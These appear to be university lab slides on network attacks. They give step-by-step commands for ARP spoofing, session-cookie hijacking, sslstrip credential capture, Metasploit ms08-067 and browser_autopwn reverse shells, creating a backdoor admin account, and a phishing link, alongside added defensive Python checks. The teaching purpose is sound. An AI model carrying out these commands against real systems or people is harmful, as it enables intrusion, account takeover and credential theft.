Network Attacks - Computer Networks Security Laboratory

Cybernetics and Economic Informatics Faculty, Information Security Master

Computer Networks Security
Laboratory Topic: Network Attacks

Adrian Furtună MSc, C|EH [email protected]

"With great power comes great responsibility"

Agenda
1. Interception of network traffic transmitted using a clear-text protocol (HTTP)
   => obtaining session cookies
   => using session cookies to enter a victim's web session
2. Interception of network traffic transmitted using an encrypted protocol (HTTPS)
   => obtaining username and password for web login
3. Scanning the Windows VM using nmap (+ Snort disabled/enabled)
4. Scanning the Windows VM using Nessus (+ Snort disabled/enabled)
5. Gaining access to the Windows VM by exploiting a network service vulnerability
6. Gaining access to a Windows machine with a client-side attack:
   => social engineering
   => exploit browser vulnerability
   => use Metasploit to own the machine

Network Attacks

2

Rules
It is forbidden:
- Any scanning / attack outside the laboratory network
- Any scanning / attack against your colleagues' machines or against the instructor's machine

Breaking these rules might lead to severe penalties.

Administrative tasks
Connect to ftp://[email protected] (username: stud, password: stud)
Download:
- Course slides
- VMware Player: VMware-player-3.1.3.exe
- Windows VM: winxpsp2_web_snort.zip
- Backtrack VM: bt4-final-vm.zip
Install VMware Player
Unzip both virtual machines

Virtual machine configuration


Laboratory setup (1)
You will work in pairs (1 pair = 2 distinct computers): attacker and victim
- Victim machine = host machine
- Attacker machine = Backtrack VM
Start Backtrack [username: root, password: toor]
Open graphic mode: startx &
Set the network card in bridged mode!
Obtain an IP address: dhclient eth0

Laboratory setup (2)


Exercise 1
Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account.
- The victim needs a valid Yahoo mail account (a test account)
- The victim will open a web mail session
- The attacker:
  1. Becomes MITM
  2. Captures the network traffic of the victim and extracts the necessary data

Exercise 1 cont.
Attacker machine: become MITM and intercept all traffic sent by the Victim to the Gateway. View the traffic using Wireshark.
1. Find the IP addresses of Victim and Gateway
2. Activate the routing process in Backtrack:
   echo 1 > /proc/sys/net/ipv4/ip_forward
3. Inform the Victim that the Gateway's MAC address is your (attacker) MAC address (ARP poisoning using ARP replies):
   arpspoof -i eth0 -t IP_Victim IP_Gateway
4. View the network traffic of the Victim using Wireshark
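On the Victim's side, the ARP poisoning of step 3 leaves a visible trace: the Gateway's IP and the attacker's IP resolve to the same MAC, and later ARP replies contradict the mapping that was first learned. The Python check below is an added defender-side example (not part of the original slides); the arp -a output, IPs and MAC addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of "arp -a" on the Windows victim while the attacker
# (192.168.1.50 here) is answering ARP requests for the gateway (192.168.1.1).
ARP_A_OUTPUT = """\
Interface: 192.168.1.23 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-aa-bb-cc     dynamic
  192.168.1.50          00-0c-29-aa-bb-cc     dynamic
  192.168.1.77          00-1a-2b-3c-4d-5e     dynamic
"""

# One "<ip> <mac> <type>" row; accepts "-" (Windows) and ":" (Linux) MAC separators.
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\s+\w+")

def norm_mac(mac):
    return mac.lower().replace("-", ":")

def parse_arp_table(text):
    """Return {ip: mac} from "arp -a" / "arp -n" style output."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m:
            table[m.group(1)] = norm_mac(m.group(2))
    return table

def find_shared_macs(table):
    """Return {mac: [ips]} for every MAC claimed by more than one IP; the gateway
    and a second host sharing one MAC is the classic arpspoof symptom."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def watch_arp_replies(replies, trusted=None):
    """Stream check over (sender_ip, sender_mac) pairs from observed ARP replies.
    The first MAC seen for an IP (or a trusted static entry) is kept; each later
    reply claiming a different MAC for that IP is reported as (ip, old, new)."""
    known = {ip: norm_mac(mac) for ip, mac in (trusted or {}).items()}
    alerts = []
    for ip, mac in replies:
        mac = norm_mac(mac)
        if ip in known and known[ip] != mac:
            alerts.append((ip, known[ip], mac))
        known.setdefault(ip, mac)
    return alerts
```

A static ARP entry for the gateway on the victim (or Dynamic ARP Inspection on a managed switch) is the usual mitigation; the stream check is what tools such as arpwatch do continuously.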

Exercise 1 cont.
1. Find the session cookies of the Victim and use them to enter his email session: Wireshark -> Follow TCP stream on a TCP packet sent by the Victim
2. Copy the cookies Y and T in a text file
3. Install the Firefox plugin Add N Edit Cookies
4. Open a Yahoo mail session of your own (attacker)
5. Use the plugin to edit your cookies and replace Y and T with the ones of the Victim
6. Refresh the web page

Exercise 2
Intercept network traffic during an HTTPS session. Find the username and password of the Victim.
1. Make yourself MITM (see exercise 1)
2. Start SSLSTRIP and make it listen on port 1234:
   sslstrip -l 1234 -s -w traffic.log
   More details here: http://www.thoughtcrime.org/software/sslstrip/
3. Configure IPTABLES to redirect HTTP traffic to SSLSTRIP:
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
4. The victim accesses a web site using HTTPS (ex. Yahoo login)
5. Extract the useful information from the file traffic.log

About Snort
http://www.snort.org/assets/166/snort_manual.pdf
- Network-based IDS
- Open source (free)
- Sourcefire commercial version (appliance): http://www.sourcefire.com/
- Portable (Linux, Windows, MacOS X, Solaris, BSD, HP-UX, etc.)
- Multiple mechanisms for intrusion detection:
  - Signatures (rules): www.bleedingsnort.com
  - Statistic anomalies
  - Protocol anomalies

About Snort cont.
Snort running modes:
- Sniffer mode (like tcpdump): snort.exe -v -d -e
- Packet logger: snort.exe -vde -l ..\log
- NIDS: snort.exe -d -l ..\log -c ..\etc\snort.conf

Snort data flow:
Packet Stream -> Sniffing -> Packet Decoder -> Preprocessor (Plug-ins) -> Detection Engine (Plug-ins) -> Output Stage (Plug-ins) -> Alerts/Logs

Nmap briefings
- TCP connect() scan: nmap -sT
- TCP SYN scan: nmap -sS
- UDP scan: nmap -sU
- Ping scan: nmap -sP
- TCP FIN / Xmas Tree / Null scan: nmap -sF / -sX / -sN
- Version detection: nmap -sS -sV
- OS fingerprinting: nmap -sS -O

Example: $ nmap -sS -sV -O -F -n 192.168.1.1

Change setup
- Start the Windows VM
- New attack direction: Backtrack -> Windows VM

Exercise 3
Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).
Obtain the following information (from a single scan):
- Live hosts
- Open TCP ports
- Service version
- Operating system
- Save all output in a text file

Hints: nmap -h, man nmap

Exercise 3 cont.
Check if the scanning can be detected by a NIDS (Snort):
- Authenticate to the Windows VM (password: user)
- Start Snort: cmd.exe -> cd c:\snort\bin
  snort.exe -d -l ..\log -c ..\etc\snort.conf -A console
- Perform the scanning again using Nmap
- Any alert? (see c:\Snort\log\alert.ids)
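To answer "Any alert?" systematically rather than by eye, the added Python example below (not from the original slides) parses Snort's one-line alert format as printed with -A console and groups the alerts by source host; alert.ids on disk uses the multi-line full format with the same header fields. The sample alert lines, rule ids, messages and addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed sample alerts in Snort's one-line ("fast") format as printed with -A console.
# Timestamps, rule ids, messages and addresses are illustrative, not captured output.
SAMPLE_ALERTS = """\
03/10-14:22:01.101  [**] [1:469:3] ICMP PING NMAP [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.1.50 -> 192.168.1.23
03/10-14:22:02.210  [**] [1:1228:7] SCAN nmap XMAS [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.50:40001 -> 192.168.1.23:139
03/10-14:22:02.215  [**] [1:1228:7] SCAN nmap XMAS [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.50:40001 -> 192.168.1.23:445
03/10-14:22:02.220  [**] [1:1228:7] SCAN nmap XMAS [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.50:40001 -> 192.168.1.23:3389
03/10-14:30:45.001  [**] [1:1418:13] SNMP request tcp [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.77:51000 -> 192.168.1.23:161
"""

# timestamp [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {PROTO} src[:port] -> dst[:port]
FAST_ALERT = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r"(?:\s+\[Classification:\s*(?P<cls>[^\]]*)\])?\s+\[Priority:\s*(?P<prio>\d+)\]"
    r"\s+\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$")

def parse_fast_alerts(text):
    """Return one dict per parsable alert line; lines that do not match are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_ALERT.match(line)
        if m:
            a = m.groupdict()
            for k in ("gid", "sid", "rev", "prio", "sport", "dport"):
                a[k] = int(a[k]) if a[k] is not None else None
            alerts.append(a)
    return alerts

def summarize_by_source(alerts, port_threshold=3):
    """Group alerts per source IP. A source is flagged as a scan suspect when it hit
    at least port_threshold distinct destination ports or fired any 'SCAN' rule."""
    per_src = defaultdict(lambda: {"alerts": 0, "dst_ports": set(), "sids": set(), "msgs": set()})
    for a in alerts:
        s = per_src[a["src"]]
        s["alerts"] += 1
        s["sids"].add(a["sid"])
        s["msgs"].add(a["msg"])
        if a["dport"] is not None:
            s["dst_ports"].add(a["dport"])
    for s in per_src.values():
        s["dst_ports"] = sorted(s["dst_ports"])
        s["scan_suspect"] = (len(s["dst_ports"]) >= port_threshold
                             or any(m.startswith("SCAN") for m in s["msgs"]))
    return dict(per_src)
```

Compare the flagged source against the Backtrack VM's IP from the scan you just ran; a SYN scan with -sS that fires no rule at all is itself a finding about the rule set in use.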


Exercise 4
Scan the victim machine using Nessus to find vulnerabilities
1. First install Nessus on BackTrack: download Nessus (for Ubuntu 9.10 32 bit) from http://www.tenable.com
   dpkg -i Nessus-4.4.1-ubuntu910_i386.deb
2. Then obtain a Nessus activation code (Home Feed): http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed
3. Configure the Nessus server:
   - Add a Nessus user: /opt/nessus/sbin/nessus-adduser
   - Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE
   - Start the Nessus server: /etc/init.d/nessusd start
4. Start the Nessus client: https://127.0.0.1:8834

Exercise 4 cont.
Sample vulnerability:
1. Create a scan policy
2. Select plugins
3. Set target
4. Run scan

About Metasploit
Framework for writing and executing exploits
Modules: Exploits, Auxiliary, Payloads, Encoders, Nops
User interfaces:
- console: msfconsole
- GUI: msfgui
Updates:
cd /pentest/exploits/framework3
svn update
Workflow: Select Exploit -> Configure options + payload -> Run exploit -> Execute payload
Tutorial: http://www.offensive-security.com/metasploit-unleashed

Exercise 5
We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to the Victim machine
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. help
4. search ms08-067
5. use exploit/windows/smb/ms08_067_netapi
6. show options, show payloads
7. set RHOST, LHOST, PAYLOAD, TARGET = 3, etc. (for payload use windows/shell/reverse_tcp)
8. exploit
9. Execute Windows commands in the obtained shell (ex. ipconfig, hostname)

Exercise 5 cont.
Obtain Remote Desktop access to the Victim machine:
- Add a new user:
  net user myuser mypassword /add
- Add the new user in the local Administrators group:
  net localgroup Administrators myuser /add
- Start the Remote Desktop service:
  reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Check if the victim has opened the port for Remote Desktop (use nmap)
- Connect to the victim machine using:
  rdesktop 192.168.x.x &
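The steps above leave two cheap-to-audit traces on the Victim: an unexpected member of the local Administrators group and fDenyTSConnections flipped to 0. The added Python example below (not part of the original slides) parses the output of net localgroup Administrators and of reg query for that value and compares both with a baseline; the command output shown is constructed, and the baseline list is whatever the machine's owner knows to be legitimate.

```python
import re

# Constructed output of: net localgroup Administrators   (after "myuser" was added)
NET_LOCALGROUP_OUTPUT = """\
Alias name     Administrators

Members

-------------------------------------------------------------------------------
Administrator
myuser
user
The command completed successfully.
"""

# Constructed output of:
# reg query "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
REG_QUERY_OUTPUT = """\
HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
"""

def parse_localgroup_members(text):
    """Return the member names listed between the dashed line and the trailing status line."""
    members, in_list = [], False
    for line in text.splitlines():
        if line.startswith("-----"):
            in_list = True
        elif in_list and line.startswith("The command completed"):
            break
        elif in_list and line.strip():
            members.append(line.strip())
    return members

def parse_reg_dword(text, value_name):
    """Return the integer value of a REG_DWORD line from "reg query" output, or None."""
    m = re.search(r"^\s*" + re.escape(value_name) + r"\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)", text, re.M)
    return int(m.group(1), 0) if m else None

def audit_remote_access(localgroup_text, reg_text, baseline_admins, rdp_expected_enabled=False):
    """Compare the live state with a baseline: report administrators not in the baseline
    and whether Remote Desktop is enabled (fDenyTSConnections == 0) contrary to expectation."""
    admins = parse_localgroup_members(localgroup_text)
    deny = parse_reg_dword(reg_text, "fDenyTSConnections")
    rdp_enabled = deny == 0
    return {
        "unexpected_admins": sorted(set(admins) - set(baseline_admins)),
        "rdp_enabled": rdp_enabled,
        "rdp_mismatch": deny is not None and rdp_enabled != rdp_expected_enabled,
    }
```

On a live host the same signals show up in the Security event log (account creation, group membership change) and as a newly listening port 3389, which is what the nmap check in the exercise would reveal to the defender as well.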

What if?
- Victim has all ports closed (firewall)
- Operating system is patched
Answer: attack client applications and plugins (web browser, Acrobat Reader, MS Office, etc.)

Change setup
- Start the firewall of the Windows VM
- Disable any exceptions
- Use nmap to verify that there are no more open ports

Exercise 6
Exploit a browser vulnerability to gain remote access. Use Metasploit and browser autopwn:
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. use auxiliary/server/browser_autopwn
4. set LHOST 192.168.x.x (attacker IP)
5. set SRVPORT 80
6. set URIPATH mypictures.html
7. exploit

Exercise 6 cont.
- Send the victim an email containing the link: http://192.168.x.x/mypictures.html
- Victim clicks the link
- Attacker obtains a meterpreter session

Other useful tools
- Ettercap: http://ettercap.sourceforge.net
- Cain&Abel: http://www.oxid.it/cain.html
- The Middler: http://inguardians.com/tools

Q&A